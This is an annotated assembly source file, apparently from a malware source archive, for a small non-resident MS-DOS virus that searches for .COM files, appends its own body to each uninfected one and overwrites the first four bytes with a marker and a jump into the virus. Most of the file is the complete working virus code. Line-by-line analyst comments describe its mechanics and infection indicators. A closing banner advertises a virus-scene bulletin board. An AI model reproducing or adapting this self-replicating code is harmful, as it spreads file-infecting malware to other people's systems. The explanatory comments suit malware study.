MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.mini111.asm

;****************************************************************************
;* Mini non-resident virus
;****************************************************************************
; One 16-bit segment holds code, data and stack: the ASSUME below maps CS, DS,
; ES and SS to cseg, matching the flat layout of a DOS .COM image.
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
; From here on every unsuffixed numeric literal is hexadecimal, so "int 21"
; assembles as INT 21h and "mov dl,80" loads 80h.
.RADIX 16
; Number of bytes appended to each target file: everything from 'start' up to
; (not including) 'eind'.
FILELEN equ eind - start
; Offset of the '*.COM' search pattern relative to 'start' (69h = 105 decimal).
; Hand-written constant, used by "lea dx,[si+FILNAM]"; it has to equal the
; assembled distance from 'start' to 'filename'.
FILNAM equ 69
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
; Stand-in host: makes the listing assemble to a .COM that already has the
; infected layout. Bytes at 0100h are 4D E9 04 00:
;   4D       marker byte that the infection check tests (cmp byte ptr [si],4Dh);
;            as an instruction it is DEC BP
;   E9 0004  near jump; the displacement is relative to 0104h, so it lands on
;            0108h, the first instruction after the four saved bytes at 'start'
; For analysis: an infected file begins with 4D E9 followed by a 16-bit
; displacement (see the two "mov word ptr" stores in the main body).
org 100h
begin: db 4Dh
db 0E9, 4, 0
;****************************************************************************
;* Begin of the virus
;****************************************************************************
; Layout: the four bytes at 'start' are data, not code. They hold the host's
; original first four bytes (for the dummy host: CD 20 = INT 20h, then two
; zero bytes). Execution arrives at "push si" via the jump at 0101h.
;
; Register roles, as established by the code below:
;   si = address of 'start' in memory; also the 4-byte file I/O buffer
;   di = 0100h while the host is restored, later the target's length (low word)
;   bx = DOS handle of the file currently open
;   cx/dx = reloaded with 0004h / si by the 'int21' helper after every call
;
; Analyst notes, based only on what this listing shows:
;   - Non-resident and no payload: no interrupt vector is changed; the code
;     loops over find-first/find-next matches and then returns to the host.
;   - Infected files start with 4D E9 <len-lo> <len-hi> and grow by FILELEN
;     bytes; the appended block ends with the string '*.COM',0.
;   - No INT 21h function 43h (attributes) or 57h (date/time) call appears, so
;     a changed length and a fresh modification time are observable indicators.
start: db 0CDh, 20h, 0, 0
push si ;si=0100 per the author: nothing here sets SI, it is assumed at entry;
        ;this word is the return address popped by the final RET in setDTA
mov di,si ;di = 0100h, destination of the restore
add si,[si+2] ;add the jump displacement stored at 0102h: si -> saved bytes (0104 here)
push si
movsw ;copy the four saved bytes back over the marker and jump at 0100h,
movsw ;so the host image in memory is as it was before infection
pop si ;si -> start (buffer)
mov dh,0FF ;set DTA to FF80 (setDTA supplies dl=80)
           ;NOTE(review): presumably keeps PSP:0080 intact for the host - confirm
call setDTA
lea dx,[si+FILNAM] ;dx -> filename
mov ah,4Eh ;find first file
infloop: int 21 ;AH is 4Eh on the first pass, 4Fh when reached from exit1
cwd ;DX = sign of AX; flags untouched, so CF from INT 21h survives.
    ;On failure AX is a small positive error code, giving DX=0000,
    ;which setDTA turns into DTA=0080
jc setDTA ;no match: JMP (not CALL), so setDTA's RET pops 0100h and runs the host
mov dx,0FF9Eh ;DTA (FF80) + 1Eh = name of the matched file
mov ax,3D02h ;open the file (access mode 2 = read/write)
call int21 ;returns with cx=0004, dx=si; CF still reflects the open
jc exit1 ;open failed: try the next match
xchg bx,ax ;bx = file handle
mov ah,3fh ;read begin of file: 4 bytes into the buffer at si
int 21
cmp byte ptr [si],4Dh ;EXE or infected COM?
je exit2 ;first byte is 4Dh: leave the file untouched
mov al,2 ;go to end of file
call seek ;ax = low word of the file length
xchg ax,di ;di = file length, kept for the jump displacement
mov cl,FILELEN ;write program to end of file; ch is still 0, so cx = FILELEN
mov ah,40h ;write cx bytes from ds:dx (= si: the 4 bytes just read + this code)
int 21
mov al,0 ;back to the start of the file
call seek
mov word ptr [si],0E94Dh ;stored as bytes 4D E9: marker + near-jump opcode
mov word ptr [si+2],di ;jump displacement = original file length
mov ah,40h ;write the 4-byte header (cx=0004, dx=si set by seek)
int 21
exit2: mov ah,3Eh ;close the file
int 21
exit1: mov ah,4Fh ;find next file
jmp short infloop
; setDTA - set the DOS Disk Transfer Area to DS:DX with DL forced to 80h.
; In:    dh = high byte of the DTA offset (FFh from the start-up call,
;             00h when reached from infloop after CWD)
; Out:   DTA = DS:(dh)80h
; Clobb: ah, dl, plus whatever INT 21h function 1Ah itself changes
; Doubles as the exit path: infloop reaches it with JC rather than CALL, so
; the RET below pops the 0100h pushed at entry and transfers to the host.
setDTA: mov dl,80
mov ah,1A
int 21
ret
; seek / int21 - two entry points sharing one tail.
;
; seek:  In:  al = origin (callers pass 0 = start of file, 2 = end of file),
;             bx = file handle
;        Sets ah=42 (move file pointer) and uses CWD to zero DX: AX is 42xxh,
;        i.e. positive, so DX becomes 0000. Falls through into int21.
; int21: In:  ax = INT 21h function and sub-function, other registers as the
;             function needs them
;        Zeroes CX, issues INT 21h, then reloads cx=0004 and dx=si so the
;        caller is ready for a 4-byte read or write on the buffer at si.
; Out:   ax and CF as returned by INT 21h (the MOVs after it do not touch
;        flags); DX from INT 21h is overwritten, so after a seek only the low
;        word of the file position is available to the caller.
seek: mov ah,42
cwd
int21: xor cx,cx ;seek: offset CX:DX = 0
int 21
mov cl,04 ;cx = 0004: byte count for the next read/write
mov dx,si ;dx -> buffer at 'start'
return: ret ;label 'return' is not referenced anywhere in this listing
;****************************************************************************
;* Data
;****************************************************************************
; ASCIIZ search pattern handed to find-first through "lea dx,[si+FILNAM]".
; It carries no drive or path component.
filename db '*.COM',0
; End-of-body marker; FILELEN is computed as eind - start.
eind:
cseg ends
end begin ;entry point of the assembled program is 'begin' (0100h)

; -------------------------------------------------------------------------
; ---------------> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <---------------
; -----------> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <-----------
; -------------------------------------------------------------------------